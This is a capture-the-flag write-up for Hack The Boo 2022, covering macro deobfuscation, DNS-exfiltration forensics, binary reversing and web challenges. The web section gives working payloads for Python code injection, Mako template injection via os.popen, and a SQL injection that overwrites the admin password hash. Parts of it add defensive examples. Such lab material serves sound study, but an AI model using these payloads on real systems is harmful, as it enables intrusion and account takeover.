Hack The Boo 2022 CTF Challenge Writeups
An entry-level CTF competition. Event link:
https://ctf.hackthebox.com/event/details/hack-the-boo-637
Forensics
1.Halloween_Invitation
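Key points:
1. Extracting macros from a document
2. Deobfuscating the code
Unzipping the archive gives a document. The .docm extension means the document is macro-enabled, so we need to extract the macros.
Here we use the olevba.py script to extract them: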
https://github.com/decalage2/oletools/blob/master/oletools/olevba.py
Once downloaded, run it directly:
python3 olevba.py /home/kali/hacktheboo2022/forensics/halloween_invitation/invitation.docm
The macro code is also obfuscated.
We copy this code out
and write a script to deobfuscate it:
#!/usr/bin/python

def decodeAsHex(s):
    # Layer 1: every two hex digits become one character
    return "".join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 2)])

def decodeChar(s):
    # Layer 2: space-separated decimal character codes become characters
    return "".join([chr(int(c)) for c in s.split(' ')])

def getBase64EncodedPayload():
    command = ""
    # The statements copied from the olevba output go here, one per line,
    # each with its own two hex string literals:
    #   command = command + decodeChar(decodeAsHex("...") + decodeAsHex("..."))
    return command

print(getBase64EncodedPayload())
After running the script we get a base64-encoded string, which we decode:
echo "<base64 string printed by the script>" | base64 -d
This gives the flag:
HTB{5up3r_345y_m4cr05}
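The three layers handled above (hex, decimal character codes, base64) can also be peeled automatically during triage. This is an added example, not the author's script; it generalizes to any nesting order of those three encodings, the sample input is constructed, and the UTF-16LE handling of the innermost layer is an assumption that matches PowerShell encoded commands.

```python
import base64
import re

HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
CODES_RE = re.compile(r"\d{1,3}(?: \d{1,3})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_base64_text(blob):
    """Base64 to text; UTF-16LE is assumed when every second byte is zero."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def peel(blob, max_layers=8):
    """Strip one encoding per pass; return (layer names, remaining text)."""
    layers = []
    for _ in range(max_layers):
        blob = blob.strip()
        try:
            if HEX_RE.fullmatch(blob):
                blob, name = bytes.fromhex(blob).decode("ascii"), "hex"
            elif CODES_RE.fullmatch(blob):
                blob, name = "".join(chr(int(c)) for c in blob.split(" ")), "char-codes"
            elif len(blob) % 4 == 0 and B64_RE.fullmatch(blob):
                blob, name = decode_base64_text(blob), "base64"
            else:
                break  # nothing recognisable left: treat as plaintext
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            break
        layers.append(name)
    return layers, blob


def build_sample(text):
    """Constructed sample: wrap text in the same three layers, innermost first."""
    b64 = base64.b64encode(text.encode("utf-16-le")).decode("ascii")
    codes = " ".join(str(ord(ch)) for ch in b64)
    return codes.encode("ascii").hex()


if __name__ == "__main__":
    layers, text = peel(build_sample("Write-Output 'constructed sample'"))
    print(layers, text)
```

The detection is heuristic: it stops at the first string that matches none of the three encodings, so short plaintext that happens to look like hex or base64 should be checked by hand.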
2.TrickOrBreach
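Key points:
1. DNS traffic analysis
Open the capture file.
It contains only DNS traffic, and running strings on it shows a lot of hexadecimal data.
We export that hexadecimal data: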
tshark -r capture.pcap -T fields -e dns.qry.name > a.txt
Use a text editor to strip the .pumpkincorp.com suffix,
then use uniq to drop the repeated strings:
cat a.txt| uniq > b.txt
Converting the hexadecimal to ASCII shows that this is an Excel file.
Unpacking it with unzip reveals the flag:
HTB{M4g1c_c4nn0t_pr3v3nt_d4t4_br34ch}
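The manual steps above (strip the suffix, drop repeats, hex-decode, recognise the container) can be done in one pass. This is an added example, not part of the original writeup; the query list is constructed, and the member name inside the sample archive is a placeholder.

```python
import io
import zipfile

SUFFIX = ".pumpkincorp.com"  # domain suffix stripped in the step above


def rebuild_from_queries(names, suffix=SUFFIX):
    """Join the hex labels of consecutive-unique queries into the original bytes."""
    chunks, previous = [], None
    for name in names:
        name = name.strip().lower().rstrip(".")
        if not name.endswith(suffix):
            continue  # lookup for some other domain
        label = name[: -len(suffix)]
        if label == previous:
            continue  # same query listed again (what uniq removes)
        previous = label
        try:
            chunks.append(bytes.fromhex(label))
        except ValueError:
            continue  # label is not hex data
    return b"".join(chunks)


def identify(data):
    """Classify by magic bytes; for a ZIP container also list its members."""
    if not data.startswith(b"PK\x03\x04"):
        return "unknown", []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        members = archive.namelist()
    kind = "xlsx" if any(m.startswith("xl/") for m in members) else "zip"
    return kind, members


def build_sample_queries(chunk_bytes=30):
    """Constructed sample: a tiny xlsx-like ZIP sent as hex labels, each listed twice."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("xl/sharedStrings.xml", "<sst><si><t>constructed</t></si></sst>")
    hexed = buffer.getvalue().hex()
    step = chunk_bytes * 2
    labels = [hexed[i:i + step] for i in range(0, len(hexed), step)]
    names = ["www.example.org"]  # unrelated lookup mixed into the capture
    for label in labels:
        names += [label + SUFFIX, label + SUFFIX]
    return names


if __name__ == "__main__":
    print(identify(rebuild_from_queries(build_sample_queries())))
```

Like uniq, this only collapses adjacent repeats, so two genuinely identical neighbouring chunks would be merged. If the repeats come from responses echoing the question, exporting queries only with `-Y "dns.flags.response == 0"` in tshark avoids them at the source.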
3.Wrong_Spooky_Season
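Key points:
1. Traffic analysis
Open the capture file.
View the protocol hierarchy statistics.
Select the data entry.
Following the stream reveals a base64 string.
It is reversed, so we just reverse it back: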
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d
This gives the flag:
HTB{j4v4_5pr1ng_just_b3c4m3_j4v4_sp00ky!!}
Alternatively, just use strings to list the strings in the capture:
strings capture.pcap
Reversing
1.Cult_Meeting
Checking the binary shows it is 64-bit, so we analyze it statically with IDA:
char s[64]; // [rsp+0h] [rbp-40h] BYREF

setvbuf(_bss_start, 0LL, 2, 0LL);
puts("\x1B[3mYou knock on the door and a panel slides back\x1B[0m");
puts(asc_2040);
fwrite("\"What is the password for this week's meeting?\" ", 1uLL, 0x30uLL, _bss_start);
fgets(s, 64, stdin);
*strchr(s, 10) = 0;
if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") )
{
  puts("\x1B[3mThe panel slides closed and the lock clicks\x1B[0m");
  puts("| | \"Welcome inside...\" ");
  system("/bin/sh");
}
else
{
  puts(" \\/");
  puts(asc_2130);
}
if ( !strcmp(s, "sup3r_s3cr3t_p455w0rd_f0r_u!") )……system("/bin/sh");……
The key part is this if check: it compares our input with the string sup3r_s3cr3t_p455w0rd_f0r_u!. If they match, it gives us a shell.
We simply enter sup3r_s3cr3t_p455w0rd_f0r_u!
and successfully get the flag:
HTB{1nf1ltr4t1ng_4_cul7_0f_str1ng5}
2.EncodedPayload
This is a 32-bit program, but it prints nothing when run, so we use strace to trace its system calls:
strace ./encodedpayload
This gives the flag:
HTB{PLz_strace_M333}
3.Ghost_Wrangler
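This is a 64-bit program; we open it in IDA for static analysis:
const char *flag; // [rsp+8h] [rbp-8h]

flag = (const char *)get_flag(argc, argv, envp);
printf(
  "%s\r|\x1B[4m%*.c\x1B[24m| I've managed to trap the flag ghost in this box, but it's turned invisible!\n"
  "Can you figure out how to reveal them?\n",
  flag,
  40,
  95LL);
return 0;
A very simple program: it loads the flag, so we can just inspect the program's stack.
Run the program under gdb, set a breakpoint at the address of main, and step through slowly.
After the call instruction has executed, we get the flag: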
HTB{h4unt3d_by_th3_gh0st5_0f_ctf5_p45t!}
4.Ouija
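This is a 64-bit program; again we open it in IDA for static analysis.
At the very top there is a strange-looking string.
The program then performs some operations on this string. Analysis shows it is just a simple character substitution, and applying ROT13 gives the flag: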
HTB{Adding_sleeps_to_your_code_makes_it_easy_to_optimize_later!}
5.Secured_transfer
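We are given a program and a capture file; open the capture.
It holds only a few TCP exchanges, but one packet has the FIN, PSH and ACK flags set and carries an encrypted data string: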
5f558867993dccc99879f7ca39c5e406972f84a3a9dd5d48972421ff375cb18c
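Checking the program shows it is 64-bit, so we open it in IDA.
The program just listens on a port and transfers a file, but one of its functions contains the encryption key.
Decrypting with AES gives the flag: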
HTB{vryS3CuR3_F1L3_TR4nsf3r}
PWN
1.Pumpkin_Stand
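Open IDA for static analysis.
The program first shows a menu and stores our input in the variable v3, then asks how many we want and stores that value in v4.
The pumpcoins balance is then reduced by the product of our two inputs, and this line of code introduces an integer overflow vulnerability.
An integer overflow can occur when software performs a calculation whose logic assumes the result will always be larger than the original value.
If we enter 1 we never reach the flag branch, so we must not enter 1.
The flag is printed when pumpcoins > 9998.
Run the program.
Choose 2.
Entering a sufficiently large number triggers the vulnerability and yields the flag.
Flag obtained.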
Web
1.Evaluation_Deck
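Visit the site; it is just a small game.
Start Burp, then click any card.
The request carries some parameters at the bottom: the monster's health is 100 and we subtract 54.
Refresh the page and try changing the damage dealt.
We win, but nothing pops up.
Analyzing the source code shows that the operator parameter can be used to execute commands: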
\nimport subprocess as sp\nresult=sp.getoutput('cat ../flag.txt')\ny =
Send the payload to get the flag.
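Why the operator parameter is dangerous, and one way to fix it, shown without executing anything. This is an added example, not the challenge's source code: build_source is an assumed shape for the vulnerable handler, and the function and variable names are hypothetical.

```python
import ast
import operator as op

# The payload shown above, used here only as parser input; it is never executed.
PAGE_PAYLOAD = "\nimport subprocess as sp\nresult=sp.getoutput('cat ../flag.txt')\ny = "


def build_source(health, operator_param, attack):
    """Assumed shape of the vulnerable handler: the parameter is pasted into code."""
    return f"result = {int(health)} {operator_param} {int(attack)}"


def statement_types(source):
    """Parse without executing and name each top-level statement."""
    return [type(node).__name__ for node in ast.parse(source).body]


# Hardened form: the parameter selects a function and is never compiled.
ALLOWED = {"+": op.add, "-": op.sub, "*": op.mul, "/": op.truediv}


def apply_operator(health, operator_param, attack):
    try:
        func = ALLOWED[operator_param]
    except (KeyError, TypeError):  # unknown symbol, or an unhashable JSON value
        raise ValueError("unsupported operator") from None
    return func(int(health), int(attack))


if __name__ == "__main__":
    print(statement_types(build_source(100, "-", 54)))           # one assignment
    print(statement_types(build_source(100, PAGE_PAYLOAD, 54)))  # extra statements
    print(apply_operator(100, "-", 54))
```

A legitimate operator yields a single assignment, while the payload turns the same template into several statements including an import; the allowlist version has no code path that could compile either.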
2.Spookifier
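Open the site; there is an input box, so we enter some arbitrary text.
It takes our input and echoes it back.
Analyzing the source code shows that
our input is passed straight into the template without any checks, which leads to an SSTI vulnerability.
We test whether the SSTI vulnerability is present.
It is, so we read the flag directly: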
${self.module.cache.util.os.popen("cat ../flag.txt").read()}
3.Horror_Feeds
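Go to the site; it is a login page.
Let's analyze the source code.
Only when logged in as the admin user can we see the source code.
The username we enter is placed directly into the database query, which causes SQL injection.
Because the query does not check the string we supply, we change the administrator's password hash to a hash we generated ourselves.
Passwords are stored hashed, so the password we set must also be supplied as this kind of hash.
Then we inject into the username parameter to change the administrator's password hash: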
{"username":"admin\",\"$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2") ON DUPLICATE KEY UPDATE password=\"$2a$12$m5lXqzyKreZcVbB/sxR1rOJGbyo.7oHWwI83x8N31/LDCTNhzOhp2"#"}
The change succeeds; log in to see the flag.
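How the injected username rewrites the statement, and how a bound parameter neutralises it. This is an added example, not the application's code: build_unsafe_sql is an assumed shape for the vulnerable query, sqlite3 stands in for the application's database, and the hash values are constructed placeholders.

```python
import sqlite3

# Constructed stand-ins for the bcrypt hashes; the payload shape is the one shown above.
PAYLOAD = 'admin","<new-hash>") ON DUPLICATE KEY UPDATE password="<new-hash>"#'


def build_unsafe_sql(username, password_hash):
    """Assumed shape of the vulnerable query: values are pasted between quotes."""
    return f'INSERT INTO users (username, password) VALUES ("{username}", "{password_hash}")'


def register(conn, username, password_hash):
    """Parameterized insert: values travel separately from the SQL text."""
    try:
        with conn:
            conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                         (username, password_hash))
    except sqlite3.IntegrityError:
        return False  # name already taken; the existing row is left untouched
    return True


def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    register(conn, "admin", "<admin-hash>")
    stored_payload = register(conn, PAYLOAD, "<unused-hash>")
    duplicate_admin = register(conn, "admin", "<new-hash>")
    admin_hash = conn.execute(
        "SELECT password FROM users WHERE username = ?", ("admin",)).fetchone()[0]
    row_count = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
    return stored_payload, duplicate_admin, admin_hash, row_count


if __name__ == "__main__":
    print(build_unsafe_sql(PAYLOAD, "<unused-hash>"))
    print(demo())
```

With string building, the quote in the username closes the value and the rest becomes SQL; with binding, the same string is stored as an odd-looking username and the admin row keeps its hash.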
4.Juggling_Facts
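Open the site.
Only the three buttons on the right work. Clicking the secret facts button, the site says that only the admin user can view them.
View the source code.
PHP has a feature called type juggling: when comparing variables of different types, PHP first converts them to a common, comparable type.
Reference article: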
https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
In short:
"a"=="a" -> true
"a"==true -> true
We simply send true to get the flag.